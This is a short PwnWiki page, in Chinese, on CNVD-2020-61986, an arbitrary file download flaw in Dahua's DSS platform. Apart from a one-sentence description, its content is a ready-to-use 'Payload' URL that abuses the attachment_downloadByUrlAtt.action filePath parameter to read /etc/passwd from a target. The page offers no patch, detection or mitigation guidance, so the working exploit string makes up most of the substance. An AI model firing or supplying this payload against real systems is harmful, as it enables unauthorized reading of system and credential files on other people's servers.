CNVD-2020-61986 大華DSS系統任意文件下載漏洞

From PwnWiki
Revision as of 20:43, 12 June 2021 by Pwnwiki (talk | contribs) (Created page with "<languages /> <translate> ==漏洞簡介== 浙江大華技術股份有限公司DSS存在任意文件下載漏洞,攻擊者可利用該漏洞登錄界面下載任意文件...")
(diff) ← Older revision | Latest revision (diff) | Newer revision → (diff)
Other languages:

漏洞簡介

浙江大華技術股份有限公司DSS存在任意文件下載漏洞,攻擊者可利用該漏洞登錄界面下載任意文件獲取敏感信息。


Payload

http://ip/itc/attachment_downloadByUrlAtt.action?filePath=file:///etc/passwd